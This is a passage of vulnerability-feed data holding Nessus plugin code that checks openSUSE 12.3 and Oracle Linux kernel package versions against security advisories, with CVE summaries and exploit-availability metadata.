value:\"https://bugzilla.novell.com/show_bug.cgi?id=860993\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2014-02/msg00021.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Linux Kernel recvmmsg Privilege Escalation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-debug-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-default-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-desktop-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-ec2-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-pae-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-source-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-syms\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-trace-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-vanilla-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-base-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:kernel-xen-devel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/02/04\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-default-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-source-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-source-vanilla-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"kernel-syms-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-debug-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-desktop-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-ec2-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-pae-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-trace-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-vanilla-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-vanilla-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-vanilla-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-vanilla-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-vanilla-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"i686\", reference:\"kernel-xen-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-debug-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-desktop-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-ec2-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-pae-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-trace-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-vanilla-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-vanilla-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-vanilla-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-vanilla-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-base-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-base-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-debuginfo-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-debugsource-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-3.7.10-1.28.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", cpu:\"x86_64\", reference:\"kernel-xen-devel-debuginfo-3.7.10-1.28.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-09T01:54:41", "description": "The remote Oracle Linux 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the ELSA-2014-3034 advisory.\n\n - The microcode on AMD 16h 00h through 0Fh processors does not properly handle the interaction between locked instructions and write-combined memory types, which allows local users to cause a denial of service (system hang) via a crafted application, aka the errata 793 issue. (CVE-2013-6885)\n\n - The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly manage tty driver access in the LECHO & !OPOST case, which allows local users to cause a denial of service (memory corruption and system crash) or gain privileges by triggering a race condition involving read and write operations with long strings. (CVE-2014-0196)\n\n - The ip6_route_add function in net/ipv6/route.c in the Linux kernel through 3.13.6 does not properly count the addition of routes, which allows remote attackers to cause a denial of service (memory consumption) via a flood of ICMPv6 Router Advertisement packets. (CVE-2014-2309)\n\n - Buffer overflow in the complete_emulated_mmio function in arch/x86/kvm/x86.c in the Linux kernel before 3.13.6 allows guest OS users to execute arbitrary code on the host OS by leveraging a loop that triggers an invalid memory copy affecting certain cancel_work_item data. (CVE-2014-0049)\n\n - The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer parameter. (CVE-2014-0038)\n\n - Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in the Linux kernel through 3.12.5 allows local users to gain privileges via a large id value.\n (CVE-2013-4587)\n\n - The mISDN_sock_recvmsg function in drivers/isdn/mISDN/socket.c in the Linux kernel before 3.12.4 does not ensure that a certain length value is consistent with the size of an associated data structure, which allows local users to obtain sensitive information from kernel memory via a (1) recvfrom, (2) recvmmsg, or (3) recvmsg system call. (CVE-2013-7266)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-05-20T00:00:00", "type": "nessus", "title": "Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3034)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-2929", "CVE-2013-4587", "CVE-2013-6383", "CVE-2013-6885", "CVE-2013-7263", "CVE-2013-7265", "CVE-2013-7266", "CVE-2014-0038", "CVE-2014-0049", "CVE-2014-0055", "CVE-2014-0069", "CVE-2014-0077", "CVE-2014-0101", "CVE-2014-0196", "CVE-2014-2309", "CVE-2014-2523", "CVE-2014-2851"], "modified": "2021-09-08T00:00:00", "cpe": ["cpe:/o:oracle:linux:6", "p-cpe:/a:oracle:linux:dtrace-modules-3.8.13-35.el6uek", "p-cpe:/a:oracle:linux:dtrace-modules-headers", "p-cpe:/a:oracle:linux:dtrace-modules-provider-headers", "p-cpe:/a:oracle:linux:kernel-uek", "p-cpe:/a:oracle:linux:kernel-uek-debug", "p-cpe:/a:oracle:linux:kernel-uek-debug-devel", "p-cpe:/a:oracle:linux:kernel-uek-devel", "p-cpe:/a:oracle:linux:kernel-uek-doc", "p-cpe:/a:oracle:linux:kernel-uek-firmware"], "id": "ORACLELINUX_ELSA-2014-3034.NASL", "href": "https://www.tenable.com/plugins/nessus/74101", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Oracle Linux Security Advisory ELSA-2014-3034.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(74101);\n script_version(\"1.24\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/09/08\");\n\n script_cve_id(\n \"CVE-2013-2929\",\n \"CVE-2013-4587\",\n \"CVE-2013-6383\",\n \"CVE-2013-6885\",\n \"CVE-2013-7263\",\n \"CVE-2013-7265\",\n \"CVE-2013-7266\",\n \"CVE-2014-0038\",\n \"CVE-2014-0049\",\n \"CVE-2014-0055\",\n \"CVE-2014-0069\",\n \"CVE-2014-0077\",\n \"CVE-2014-0101\",\n \"CVE-2014-0196\",\n \"CVE-2014-2309\",\n \"CVE-2014-2523\",\n \"CVE-2014-2851\"\n );\n script_bugtraq_id(\n 63983,\n 64328,\n 64743,\n 65255,\n 65909,\n 66095,\n 67199,\n 67282\n );\n\n script_name(english:\"Oracle Linux 6 : Unbreakable Enterprise kernel (ELSA-2014-3034)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Oracle Linux 6 host has packages installed that are affected by multiple vulnerabilities as referenced in the\nELSA-2014-3034 advisory.\n\n - The microcode on AMD 16h 00h through 0Fh processors does not properly handle the interaction between\n locked instructions and write-combined memory types, which allows local users to cause a denial of service\n (system hang) via a crafted application, aka the errata 793 issue. (CVE-2013-6885)\n\n - The n_tty_write function in drivers/tty/n_tty.c in the Linux kernel through 3.14.3 does not properly\n manage tty driver access in the LECHO & !OPOST case, which allows local users to cause a denial of\n service (memory corruption and system crash) or gain privileges by triggering a race condition involving\n read and write operations with long strings. (CVE-2014-0196)\n\n - The ip6_route_add function in net/ipv6/route.c in the Linux kernel through 3.13.6 does not properly count\n the addition of routes, which allows remote attackers to cause a denial of service (memory consumption)\n via a flood of ICMPv6 Router Advertisement packets. (CVE-2014-2309)\n\n - Buffer overflow in the complete_emulated_mmio function in arch/x86/kvm/x86.c in the Linux kernel before\n 3.13.6 allows guest OS users to execute arbitrary code on the host OS by leveraging a loop that triggers\n an invalid memory copy affecting certain cancel_work_item data. (CVE-2014-0049)\n\n - The compat_sys_recvmmsg function in net/compat.c in the Linux kernel before 3.13.2, when CONFIG_X86_X32 is\n enabled, allows local users to gain privileges via a recvmmsg system call with a crafted timeout pointer\n parameter. (CVE-2014-0038)\n\n - Array index error in the kvm_vm_ioctl_create_vcpu function in virt/kvm/kvm_main.c in the KVM subsystem in\n the Linux kernel through 3.12.5 allows local users to gain privileges via a large id 